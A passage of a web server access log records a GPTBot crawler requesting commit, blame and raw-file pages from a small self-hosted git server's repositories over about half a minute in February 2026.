+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:14:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=docker-compose.yml" [Client 74.7.227.38] [Length 23776] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:14:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 440340] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 440350] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" +[17/Feb/2026:14:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10856] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" +[17/Feb/2026:14:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=mail_contact.py" [Client 74.7.227.38] [Length 21280] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:14:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10859] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 11495] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" +[17/Feb/2026:14:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 11531] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" +[17/Feb/2026:14:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 17674] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" +[17/Feb/2026:14:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" +[17/Feb/2026:14:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" +[17/Feb/2026:14:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12973] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10722] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 9869] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:14:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:14:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 9876] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" +[17/Feb/2026:14:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 10134] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" +[17/Feb/2026:14:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" +[17/Feb/2026:14:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:14:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 10835] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:14:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 6440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" +[17/Feb/2026:14:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 18424] [Gzip 11.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" +[17/Feb/2026:14:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" +[17/Feb/2026:14:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12197] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:14:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs?display=source" [Client 74.7.227.38] [Length 17693] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" +[17/Feb/2026:14:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" +[17/Feb/2026:14:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 37317] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:14:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" [Client 74.7.227.38] [Length 11444] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:14:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fassets" [Client 74.7.227.38] [Length 22236] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" +[17/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" +[17/Feb/2026:14:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" +[17/Feb/2026:14:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" +[17/Feb/2026:14:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11472] [Gzip 4.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:14:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:14:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 49054] [Gzip 22.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:14:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:14:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" [Client 74.7.227.38] [Length 14239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" +[17/Feb/2026:14:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 14392] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" +[17/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 13002] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" +[17/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" [Client 74.7.227.38] [Length 9850] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" +[17/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" +[17/Feb/2026:14:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr 